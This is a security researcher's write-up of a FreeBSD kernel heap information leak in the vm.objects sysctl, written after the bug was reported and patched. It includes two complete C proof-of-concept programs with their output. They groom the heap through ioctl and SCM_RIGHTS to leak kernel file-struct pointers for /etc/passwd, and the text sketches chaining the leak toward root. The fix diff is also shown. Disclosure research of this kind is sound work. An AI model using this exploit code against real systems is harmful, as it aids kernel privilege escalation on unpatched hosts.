Access Vector Access Vector

chris@accessvector.net

FreeBSD 11.2+ vm.objects sysctl Kernel Heap Information Disclosure

chris

Introduction

FreeBSD 11.2 introduced a kernel heap information disclosure bug due to missing memory sanitisation through the vm.objects sysctl. Actually, the underlying bug was present since 10.3, but existed as a stack information disclosure instead.

While kernel information disclosure bugs aren't terribly interesting by themselves, they can form an important part of an exploit chain: disclosing useful heap addresses is often essential to paving the way to upgrade a restricted memory corruption vulnerability to an arbitrary read/write capability.

This article describes the bug, discusses simple grooming options for leaking potentially useful pointers and provides a proof-of-concept exploit to demonstrate the issue.

The vulnerability was reported to the FreeBSD Security Officer Team on the 4th of December, 2022, and subsequently patched in January after the holiday season had passed. Thanks again to Philip Paeps from the FreeBSD Security Team for a very fast response.

Vulnerability Overview

For the uninitiated, "sysctl"s are something of a second-class syscall interface. They're basically system-wide key/value pairs exposed by the kernel for reading (and sometimes writing) through the sysctl(2) syscall.

The sysctl(2) syscall allows userland to provide 3 high-level pieces of data:

  1. The key of the sysctl to query.
  2. An optional userland pointer and size to fetch the "old" value into.
  3. An optional userland pointer and size to provide a "new" value.

For a lot of sysctls, since they're system-wide, providing a "new" value requires root privileges. To read some value, userland will typically just provide a pointer/size for the "old" value and leave the "new" pointer/size as NULL/0.

While most sysctls expose simple primitive datatypes, such as strings or integers, some sysctls are more complex and interesting. To serve the more interesting cases, the FreeBSD kernel source provides the SYSCTL_PROC macro, which basically says "declare this sysctl and use that function to handle the request".

The functions that handle the requests sometimes get less attention than traditional syscalls, so they're worth exploring for vulnerabilities.

Here's the vm.objects sysctl definition from the vm/vm_object.c file in the FreeBSD kernel:

    static int
[2] sysctl_vm_object_list(SYSCTL_HANDLER_ARGS)
    {
            return (vm_object_list_handler(req, false));
    }
    
[1] SYSCTL_PROC(_vm, OID_AUTO, objects, CTLTYPE_STRUCT | CTLFLAG_RW | CTLFLAG_SKIP |
        CTLFLAG_MPSAFE, NULL, 0, sysctl_vm_object_list, "S,kinfo_vmobject",
        "List of VM objects");

We can see the SYSCTL_PROC macro defining the "objects" node of the "vm" root node [1] and referencing the function sysctl_vm_object_list [2] as the handler function.

Notice that the SYSCTL_HANDLER_ARGS macro expands to the standard argument list of a sysctl implementation:

    #define SYSCTL_HANDLER_ARGS struct sysctl_oid *oidp, void *arg1,        \
            intmax_t arg2, struct sysctl_req *req

Let's see what actually happens in vm_object_list_handler, then:

    static int
    vm_object_list_handler(struct sysctl_req *req, bool swap_only)
    {
            struct kinfo_vmobject *kvo;
            char *fullpath, *freepath;
            struct vnode *vp;
            struct vattr va;
            vm_object_t obj;
            vm_page_t m;
            u_long sp;
            int count, error;
    
[3]         if (req->oldptr == NULL) {
                    /*
                     * If an old buffer has not been provided, generate an
                     * estimate of the space needed for a subsequent call.
                     */
    ...
                    return (SYSCTL_OUT(req, NULL, sizeof(struct kinfo_vmobject) *
                        count * 11 / 10));
            }
    
[4]         kvo = malloc(sizeof(*kvo), M_TEMP, M_WAITOK);
            error = 0;
    
            /*
             * VM objects are type stable and are never removed from the
             * list once added.  This allows us to safely read obj->object_list
             * after reacquiring the VM object lock.
             */
            mtx_lock(&vm_object_list_mtx);
[5]         TAILQ_FOREACH(obj, &vm_object_list, object_list) {
    ...
                    if (obj->type == OBJT_DEAD ||
                        (swap_only && (obj->flags & (OBJ_ANON | OBJ_SWAP)) == 0))
                            continue;
                    VM_OBJECT_RLOCK(obj);
                    if (obj->type == OBJT_DEAD ||
                        (swap_only && (obj->flags & (OBJ_ANON | OBJ_SWAP)) == 0)) {
                            VM_OBJECT_RUNLOCK(obj);
                            continue;
                    }
                    mtx_unlock(&vm_object_list_mtx);
[6]                 kvo->kvo_size = ptoa(obj->size);
                    kvo->kvo_resident = obj->resident_page_count;
                    kvo->kvo_ref_count = obj->ref_count;
    ...
                    /* Pack record size down */
                    kvo->kvo_structsize = offsetof(struct kinfo_vmobject, kvo_path)
                        + strlen(kvo->kvo_path) + 1;
                    kvo->kvo_structsize = roundup(kvo->kvo_structsize,
                        sizeof(uint64_t));
[7]                 error = SYSCTL_OUT(req, kvo, kvo->kvo_structsize);
                    maybe_yield();
                    mtx_lock(&vm_object_list_mtx);
                    if (error)
                            break;
            }
            mtx_unlock(&vm_object_list_mtx);
            free(kvo, M_TEMP);
            return (error);
    }

The purpose of this sysctl is to provide a list of information about virtual memory objects to userland. This could be a pretty lengthy list depending on exactly how many objects are visible to the calling process.

If userland called the sysctl with a NULL "old" pointer, the kernel tries to provide some useful estimate of the size of buffer they should allocate and call again with [3].

If an "old" pointer/size was provided, then the kernel tries to provide as much of the information as possible. It begins by allocating an object that it will populate for each object [4]. This is a struct kinfo_vmobject struct.

Next, it loops through all of the objects on the global vm_object_list [5] and populates that information object with various pieces of information — some of which are shown in the snippet starting at [6], but many are omitted here for brevity.

Once the various fields are set, the kernel copies out the information about this current virtual memory object [7] and continues on to the next one.

The short story of what's happening, then, is that the kernel iterates over all of the registered virtual memory objects and copies out some information object for each to userland.

The object the kernel uses to store this information in is a kinfo_vmobject and is particularly interesting because the call to malloc doesn't pass the M_ZERO flag. That means that the memory will not be zero-initialised by the kernel heap allocator.

If any fields aren't explicitly set by the logic here, those uninitialised bytes will be copied out to userland.

Sure enough, it seems there are plenty of bytes that remain uninitialised:

    /*
     * The "vm.objects" sysctl provides a list of all VM objects in the system
     * via an array of these entries.
     */
    struct kinfo_vmobject {
            int     kvo_structsize;                 /* Variable size of record. */
            int     kvo_type;                       /* Object type: KVME_TYPE_*. */
            uint64_t kvo_size;                      /* Object size in pages. */
            uint64_t kvo_vn_fileid;                 /* inode number if vnode. */
            uint32_t kvo_vn_fsid_freebsd11;         /* dev_t of vnode location. */
            int     kvo_ref_count;                  /* Reference count. */
            int     kvo_shadow_count;               /* Shadow count. */
            int     kvo_memattr;                    /* Memory attribute. */
            uint64_t kvo_resident;                  /* Number of resident pages. */
            uint64_t kvo_active;                    /* Number of active pages. */
            uint64_t kvo_inactive;                  /* Number of inactive pages. */
            union {
                    uint64_t _kvo_vn_fsid;
                    uint64_t _kvo_backing_obj;      /* Handle for the backing obj */
            } kvo_type_spec;                        /* Type-specific union */
            uint64_t kvo_me;                        /* Uniq handle for anon obj */
            uint64_t _kvo_qspare[6];
            uint32_t kvo_swapped;                   /* Number of swapped pages */
            uint32_t _kvo_ispare[7];
            char    kvo_path[PATH_MAX];             /* Pathname, if any. */
    };

At first glance, it looks like we've struck info-disclosure gold with the very large kvo_path field at the end (PATH_MAX is 1024), but if we refer back to the copyout logic, we use the strlen of that field as an upper-bound.

Even so, there are a few "spare" fields that provide more than enough useful bytes to leak.

Exploitability Analysis

Uninitialised kernel heap disclosures aren't useful in every case. The case here is pretty promising, however, because the allocation comes from the general purpose heap (i.e. through malloc) and there are clearly plenty of bytes for us to target with a groom in the _kvo_qspare and _kvo_ispare fields.

So long as we can think of a way to get some useful kernel heap pointers leaked through those fields, this is a useful leak to have.

Before getting to the point of considering useful leaks, however, we should demonstrate the trivial case: leaking a bunch of bytes we can control as a starting point.

The ioctl(2) syscall is a good candidate for this:

    int
    sys_ioctl(struct thread *td, struct ioctl_args *uap)
    {
            u_char smalldata[SYS_IOCTL_SMALL_SIZE] __aligned(SYS_IOCTL_SMALL_ALIGN);
            uint32_t com;
            int arg, error;
            u_int size;
            caddr_t data;
    ...
[1]         size = IOCPARM_LEN(com);
    ...
            if (size > 0) {
                    if (com & IOC_VOID) {
    ...
                    } else {
                            if (size > SYS_IOCTL_SMALL_SIZE)
[2]                                 data = malloc((u_long)size, M_IOCTLOPS, M_WAITOK);
                            else
                                    data = smalldata;
                    }
    ...
            if (com & IOC_IN) {
[3]                 error = copyin(uap->data, data, (u_int)size);
    ...
            error = kern_ioctl(td, uap->fd, com, data);
    
            if (error == 0 && (com & IOC_OUT))
                    error = copyout(data, uap->data, (u_int)size);
    
    out:
            if (size > SYS_IOCTL_SMALL_SIZE)
[4]                 free(data, M_IOCTLOPS);
            return (error);
    }

The size of the data from userland is extracted from the ioctl command itself using the IOCPARM_LEN macro [1]. For small sizes, the kernel uses a buffer on the stack — but over a certain limit, it allocates the size using malloc [2]. This limit is 128 bytes.

With a buffer allocated, it then does a copyin [3], calls down to kern_ioctl and then frees on the exit path [4].

Why is this useful? The FreeBSD kernel heap allocator works in a LIFO fashion: malloc will return back the last memory chunk freed (for the same size class). That means that if we try to invoke a spurious ioctl (or an ioctl on a spurious file descriptor), this becomes a simple malloc, copyin, free gadget that we can use to control the uninitialised bytes of the next malloc.

If the next malloc is the one from the vm.objects sysctl then we should see those bytes coming back to us.

Here's a simple PoC to test:

#include <err.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/sysctl.h>
#include <sys/user.h>
#include <unistd.h>

static void
hexdump(const void *data, size_t datasz)
{
    const unsigned char *b = data;
    size_t n;

    for (n = 0; n < datasz; ++n) {
        fprintf(stderr, "%02x ", b[n]);

        switch ((n + 1) & 0xf) {
        case 0: fputs("\n", stderr); break;
        case 8: fputs(" ", stderr); break;
        }
    }

    fputs("\n", stderr);
}

static void
prep_leak(void)
{
    unsigned char dummy[sizeof(struct kinfo_vmobject)];

    memset(dummy, 'A', sizeof(dummy));
    ioctl(-1, _IOW(0, 0, dummy), dummy);
}

int
main(int argc, char *argv[])
{
    unsigned char buf[sizeof(struct kinfo_vmobject)];
    size_t bufsz = sizeof(buf);

    bzero(buf, sizeof(buf));

    prep_leak();
    sysctlbyname("vm.objects", buf, &bufsz, NULL, 0);

    hexdump(buf, bufsz);
    return 0;
}

Trying it out, we can see our controlled data:

$ cc -o vm_objects vm_objects.c && ./vm_objects
a8 00 00 00 01 00 00 00  00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00  04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41  a8 00 00 00 01 00 00 00
00 40 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 01 00 00 00  00 00 00 00 02 00 00 00
04 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  00 41 41 41 41 41 41 41
a8 00 00 00 01 00 00 00  00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00  04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41  a8 00 00 00 01 00 00 00
00 40 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 01 00 00 00  00 00 00 00 02 00 00 00
04 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  00 41 41 41 41 41 41 41
a8 00 00 00 01 00 00 00  00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00  04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41  a8 00 00 00 01 00 00 00
00 40 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 01 00 00 00  00 00 00 00 02 00 00 00
04 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  00 41 41 41 41 41 41 41
a8 00 00 00 01 00 00 00  00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00  04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41  a8 00 00 00 05 00 00 00

You'll notice a lot of repeated data here. That's because we provided a buffer big enough to fit a whole struct kinfo_vmobject in, but due to the strlen of the path limiting the copyout, each virtual memory object actually only occupies a small amount of the buffer.

The repeating hacking number regions are the "spare" fields that we're seeing for each object.

Finding a Leak Target

When in possession of a kernel heap information disclosure bug like this, we need to do a little research to groom the heap in a way that leaks some data we actually care about. Sadly, nobody cares about leaking "AAAA...", so we'll need to think some more.

The first thing we need to understand is which malloc bucket this leak is coming from. The kernel heap allocator coarsely organises its internal allocation buckets by size. To determine which bucket this particular leak is coming from, we need to know the size of the kinfo_vmobject struct:

$ lldb /boot/kernel/kernel
(lldb) target create "/boot/kernel/kernel"
Current executable set to '/boot/kernel/kernel' (aarch64).
(lldb) p sizeof(struct kinfo_vmobject)
(unsigned long) $0 = 1184

And check that against the malloc bucket sizes defined in kern/kern_malloc.c:

struct {
        int kz_size;
        const char *kz_name;
        uma_zone_t kz_zone[MALLOC_DEBUG_MAXZONES];
} kmemzones[] = {
        {16, "malloc-16", },
        {32, "malloc-32", },
        {64, "malloc-64", },
        {128, "malloc-128", },
        {256, "malloc-256", },
        {384, "malloc-384", },
        {512, "malloc-512", },
        {1024, "malloc-1024", },
        {2048, "malloc-2048", },
        {4096, "malloc-4096", },
        {8192, "malloc-8192", },
        {16384, "malloc-16384", },
        {32768, "malloc-32768", },
        {65536, "malloc-65536", },
        {0, NULL},
};

Since the size of the object is 1184 bytes, it's too big to come from the 1024 bucket — it must be from the 2048 bucket.

Whatever we're trying to leak, it has to come from the same bucket and has to contain something useful.

This is where a hunt for "elastic objects" is pretty handy. Rather than just looking for single structs of the right size that happen to be allocated using malloc, we can look for calls to malloc that have some dynamic element to them.

One such useful elastic object is the allocation done when file descriptors are sent over a UNIX domain socket with the SCM_RIGHTS auxiliary control message ("cmsg").

Leaking File Structs with SCM_RIGHTS

The uipc_send kernel function handles the guts of sending data over a UNIX domain socket:

    static int
    uipc_send(struct socket *so, int flags, struct mbuf *m, struct sockaddr *nam,
        struct mbuf *control, struct thread *td)
    {
    ...
            if (control != NULL &&
[1]             (error = unp_internalize(&control, td, NULL, NULL, NULL)))
                    goto release;

If an auxiliary control message was passed to the sendmsg(2) syscall, the kernel calls unp_internalize [1].

Control messages are basically extra bits of information that can be sent with a message. The control messages themselves are just sent in an array, one after another, and each message in that list can have a different "type", length and associated data.

For UNIX domain sockets, there are a few different types of extra data that a process can send in this way, but the one we're interested in here is SCM_RIGHTS, which allows a process to send file descriptors to the recipient. It's an interesting and neat feature that we can see unp_internalize handle:

    static int
    unp_internalize(struct mbuf **controlp, struct thread *td,
        struct mbuf **clast, u_int *space, u_int *mbcnt)
    {
            struct mbuf *control, **initial_controlp;
            struct proc *p;
            struct filedesc *fdesc;
            struct bintime *bt;
            struct cmsghdr *cm;
            struct cmsgcred *cmcred;
            struct filedescent *fde, **fdep, *fdev;
            struct file *fp;
            struct timeval *tv;
            struct timespec *ts;
            void *data;
            socklen_t clen, datalen;
            int i, j, error, *fdp, oldfds;
            u_int newlen;
    
            MPASS((*controlp)->m_next == NULL); /* COMPAT_OLDSOCK may violate */
            UNP_LINK_UNLOCK_ASSERT();
    
            p = td->td_proc;
            fdesc = p->p_fd;
            error = 0;
            control = *controlp;
            *controlp = NULL;
            initial_controlp = controlp;
[2]         for (clen = control->m_len, cm = mtod(control, struct cmsghdr *),
                data = CMSG_DATA(cm);
    
                clen >= sizeof(*cm) && cm->cmsg_level == SOL_SOCKET &&
                clen >= cm->cmsg_len && cm->cmsg_len >= sizeof(*cm) &&
                (char *)cm + cm->cmsg_len >= (char *)data;
    
                clen -= min(CMSG_SPACE(datalen), clen),
                cm = (struct cmsghdr *) ((char *)cm + CMSG_SPACE(datalen)),
                data = CMSG_DATA(cm)) {
    ...
                    datalen = (char *)cm + cm->cmsg_len - (char *)data;
                    switch (cm->cmsg_type) {
    ...
                    case SCM_RIGHTS:
[3]                         oldfds = datalen / sizeof (int);
                            if (oldfds == 0)
                                    continue;
                            /* On some machines sizeof pointer is bigger than
                             * sizeof int, so we need to check if data fits into
                             * single mbuf.  We could allocate several mbufs, and
                             * unp_externalize() should even properly handle that.
                             * But it is not worth to complicate the code for an
                             * insane scenario of passing over 200 file descriptors
                             * at once.
                             */
                            newlen = oldfds * sizeof(fdep[0]);
                            if (CMSG_SPACE(newlen) > MCLBYTES) {
                                    error = EMSGSIZE;
                                    goto out;
                            }
                            /*
                             * Check that all the FDs passed in refer to legal
                             * files.  If not, reject the entire operation.
                             */
                            fdp = data;
                            FILEDESC_SLOCK(fdesc);
[4]                         for (i = 0; i < oldfds; i++, fdp++) {
                                    fp = fget_noref(fdesc, *fdp);
                                    if (fp == NULL) {
                                            FILEDESC_SUNLOCK(fdesc);
                                            error = EBADF;
                                            goto out;
                                    }
                                    if (!(fp->f_ops->fo_flags & DFLAG_PASSABLE)) {
                                            FILEDESC_SUNLOCK(fdesc);
                                            error = EOPNOTSUPP;
                                            goto out;
                                    }
                            }
    
                            /*
                             * Now replace the integer FDs with pointers to the
                             * file structure and capability rights.
                             */
[5]                         *controlp = sbcreatecontrol(NULL, newlen,
                                SCM_RIGHTS, SOL_SOCKET, M_WAITOK);
                            fdp = data;
[6]                         for (i = 0; i < oldfds; i++, fdp++) {
                                    if (!fhold(fdesc->fd_ofiles[*fdp].fde_file)) {
                                            fdp = data;
                                            for (j = 0; j < i; j++, fdp++) {
                                                    fdrop(fdesc->fd_ofiles[*fdp].
                                                        fde_file, td);
                                            }
                                            FILEDESC_SUNLOCK(fdesc);
                                            error = EBADF;
                                            goto out;
                                    }
                            }
                            fdp = data;
                            fdep = (struct filedescent **)
                                CMSG_DATA(mtod(*controlp, struct cmsghdr *));
[7]                         fdev = malloc(sizeof(*fdev) * oldfds, M_FILECAPS,
                                M_WAITOK);
[8]                         for (i = 0; i < oldfds; i++, fdev++, fdp++) {
                                    fde = &fdesc->fd_ofiles[*fdp];
                                    fdep[i] = fdev;
[9]                                 fdep[i]->fde_file = fde->fde_file;
                                    filecaps_copy(&fde->fde_caps,
                                        &fdep[i]->fde_caps, true);
                                    unp_internalize_fp(fdep[i]->fde_file);
                            }
                            FILEDESC_SUNLOCK(fdesc);
                            break;
    ...

This code looks long and complex, but we needn't fear it. At the top level, the code loops over the list of cmsgs [2] and switches on the type of each. For a control message of type SCM_RIGHTS, the kernel first determines how many file descriptors follow the cmsg header [3].

Next, it loops over all of the file descriptors making sure that they're able to be sent [4] (some types of file are forbidden from being sent like this) before allocating an mbuf to hold an array of filedescent pointers [5]. mbufs are a unit of heap allocation specific to the networking stack in FreeBSD. They're backed by their own special zone and arbitrary lengths are constructed by creating a linked list of mbufs. We can largely ignore them for the discussion here.

A filedescent is how an open file within a process' file descriptor table is represented. In fact, a numeric file descriptor is literally just an index into a table of these structures:

    struct filedescent {
            struct file     *fde_file;      /* file structure for open file */
            struct filecaps  fde_caps;      /* per-descriptor rights */
            uint8_t          fde_flags;     /* per-process open file flags */
            seqc_t           fde_seqc;      /* keep file and caps in sync */
    };

Each entry points to the file struct that's open and has some other associated fields (e.g. if UF_CLOEXEC has been set for that descriptor).

Remember that at this point the kernel's only allocated an array of pointers to these.

With an array of filedescent pointers allocated, the next step is to walk over the list of file descriptors again and obtain a reference to each [6]. If this fails for any, the whole process is aborted.

Finally, the kernel has determined that the descriptors are sendable and it was able to acquire a reference on each. The last step is to allocate an array to hold the actual filedescent structs [7], then loop over the descriptors one last time [8], setting the filedescent pointers in the mbuf to an element in this new mallocd array [9].

Here's a rough diagram of how this data will look:

┌────────────────────────────────────────────────────────────────────────────────┐
│mbuf_t                                                                          │
├──────────────┬─────────────────────────────────────────────────────────────────┤
│    m_hdr     │                             m_data                              │
└──────────────┴─────────────────────────────────────────────────────────────────┘
                                                │                                 
           ┌──────────────┬──────────────┬──────┴───────┬──────────────┐          
           ▼              ▼              ▼              ▼              ▼          
   ┌──────────────┬──────────────┬──────────────┬──────────────┬──────────────┐   
   │ filedescent  │ filedescent  │ filedescent  │ filedescent  │ filedescent  │   
   ├──────────────┴──────────────┴──────────────┴──────────────┴──────────────┤   
   │malloc(nfd * sizeof(struct filedescent))                                  │   
   └──────────────────────────────────────────────────────────────────────────┘   

When the UNIX message is received by the recipient process, this process is reversed: the filedescents are pulled out of the control message and inserted into the receiving process' file descriptor table. The array of filedescents that were allocated in unp_internalize is freed once this is done. See unp_externalize if you're interested.

The elastic object we're interested in leaking is the array of filedescent structs at [7]. By leaking the contents of that array, we can discover a kernel pointer to a live file struct. That's a useful pointer to have if we have an arbitrary write, since we can do interesting things like granting write access to a file we have open for reading (e.g. /etc/passwd or /etc/libmap.conf — see man libmap.conf to spark your imagination).

We can control the size of the malloc through the number of file descriptors we send in our cmsg. Hitting our target is simple:

$ lldb /boot/kernel/kernel
(lldb) target create "/boot/kernel/kernel"
Current executable set to '/boot/kernel/kernel' (aarch64).
(lldb) p sizeof(struct kinfo_vmobject) / sizeof(struct filedescent)
(unsigned long) $0 = 24

We just need to send 24 file descriptors.

Proof of Concept

Our final exploitation strategy is:

  1. Create a connected pair of UNIX domain sockets with socketpair(2).
  2. Fork and have the child process block on a recv(2).
  3. Open the file that we wish to disclose the file pointer of.
  4. Send a message to the child process with an SCM_RIGHTS cmsg containing 24 copies of that file descriptor.
  5. Once the descriptors have been received by the child, leak memory via the vm.objects sysctl.

Here's a simple PoC:

/*
 * FreeBSD 11.2+ vm.objects sysctl Kernel Heap Information Disclosure PoC
 * 2022-Dec-08
 *
 * [email protected]
 */
#include <err.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/cpuset.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/sysctl.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

static void
pin_to_cpu(size_t n)
{
    cpuset_t cs;
    CPU_ZERO(&cs);
    CPU_SET(n, &cs);

    if (-1 == cpuset_setaffinity(CPU_LEVEL_WHICH, CPU_WHICH_PID, -1,
                sizeof(cs), &cs))
        err(1, "cpuset_setaffinity");
}

static void
child_proc(int sock)
{
    unsigned char ack = 0;

    /* receive the file descriptors */
    if (-1 == recv(sock, &ack, sizeof(ack), 0))
        err(1, "recv");

    /* acknowledge receipt so we know the buffer is free */
    if (-1 == send(sock, &ack, sizeof(ack), 0))
        err(1, "send");
}

#define NFDS (sizeof(struct kinfo_vmobject) / sizeof(struct filedescent))

static const void *
leak_kptr(int fd)
{
    struct kinfo_vmobject buf;
    size_t bufsz = sizeof(buf);
    pid_t child;
    int s[2];
    unsigned char ack = 0;
    struct iovec iov = {
        .iov_base = &ack,
        .iov_len = sizeof(ack)
    };
    unsigned char cmsgbuf[CMSG_SPACE(sizeof(int) * NFDS)];
    struct cmsghdr *cmsgh;
    struct msghdr msgh;
    size_t n;
    int *pfd;

    if (-1 == socketpair(AF_UNIX, SOCK_STREAM, PF_UNSPEC, s))
        err(1, "socketpair");

    switch ((child = fork())) {
    case -1: err(1, "fork");
    case 0:
             /* child will receive the fds */
             close(s[0]);
             pin_to_cpu(0);
             child_proc(s[1]);
             exit(0);
    }

    /* this proc will send the fds */
    close(s[1]);
    pin_to_cpu(0);

    /* set up the cmsg first */
    bzero(cmsgbuf, sizeof(cmsgbuf));
    cmsgh = (struct cmsghdr *)cmsgbuf;
    cmsgh->cmsg_level = SOL_SOCKET;
    cmsgh->cmsg_type = SCM_RIGHTS;
    cmsgh->cmsg_len = CMSG_LEN(sizeof(int) * NFDS);

    for (pfd = (int *)CMSG_DATA(cmsgh), n = 0; n < NFDS; ++n) {
        *pfd++ = fd;
    }

    /* now the msghdr */
    bzero(&msgh, sizeof(msgh));
    msgh.msg_iov = &iov;
    msgh.msg_iovlen = 1;
    msgh.msg_control = cmsgh;
    msgh.msg_controllen = cmsgh->cmsg_len;

    /* send and await ack */
    if (-1 == sendmsg(s[0], &msgh, 0))
        err(1, "sendmsg");

    if (-1 == recv(s[0], &ack, 1, 0))
        err(1, "recv");

    /* now we can leak the buffer */
    bzero(&buf, sizeof(buf));
    sysctlbyname("vm.objects", &buf, &bufsz, NULL, 0);

    /* and reap the child */
    waitpid(child, NULL, 0);

    return *(const void **)(&buf._kvo_qspare[3]);
}

int
main(int argc, char *argv[])
{
    int fd[2];

    /* open some interesting files to leak: */
    if (-1 == (fd[0] = open("/etc/passwd", O_RDONLY)))
        err(1, "open");

    if (-1 == (fd[1] = open("/etc/libmap.conf", O_RDONLY)))
        err(1, "open");

    fprintf(stderr, "[+] /etc/passwd file ptr: %p\n", leak_kptr(fd[0]));
    fprintf(stderr, "[+] /etc/libmap.conf file ptr: %p\n", leak_kptr(fd[1]));

    /* close and re-open to show LIFO behaviour: */
    fputs("[+] close + reopen\n", stderr);

    close(fd[1]);
    if (-1 == (fd[1] = open("/etc/libmap.conf", O_RDONLY)))
        err(1, "open");

    fprintf(stderr, "[+] /etc/libmap.conf file ptr (again): %p\n", leak_kptr(fd[1]));
    return 0;
}

The output of running it:

$ cc -o vm_objects vm_objects.c && ./vm_objects
[+] /etc/passwd file ptr: 0xfffffd00009db6e0
[+] /etc/libmap.conf file ptr: 0xfffffd00009db410
[+] close + reopen
[+] /etc/libmap.conf file ptr (again): 0xfffffd00009db410

Success. Now we can chain that arbitrary write vulnerability to grant us write-access to /etc/passwd, add an empty-password root user and elevate.

What do you mean you don't have an arbitrary write vulnerability...?

Fix

The fix for this bug is super simple: the malloc in vm_object_list_handler just needs to include the M_ZERO flag. This ensures that the memory is zero-initialised and nothing useful will leak back to userland:

--- a/sys/vm/vm_object.c
+++ b/sys/vm/vm_object.c
@@ -2523,7 +2523,7 @@ vm_object_list_handler(struct sysctl_req *req, bool swap_only)
                    count * 11 / 10));
        }

-       kvo = malloc(sizeof(*kvo), M_TEMP, M_WAITOK);
+       kvo = malloc(sizeof(*kvo), M_TEMP, M_WAITOK | M_ZERO);
        error = 0;

        /*

Conclusion

FreeBSD tends to do a decent job of preventing information disclosure bugs these days, but it really depends on the developer remembering to do the right thing at the right time; it's quite error-prone.

We were lucky in this case that the leaky allocation came from the general-purpose heap allocator. For many other types of object, if they originate from a dedicated zone, it's generally not possible to control the leak in such an easy way that we did here.

Even so, these bugs can be fun to play with and don't require a huge amount of effort to make into useful parts of a chain. It's worth finding them.

For context on the effort put into this research, I took around an hour to walk through a bunch of sysctls before finding this and writing a PoC maybe took 30 minutes altogether.

PoC Archive

Download here.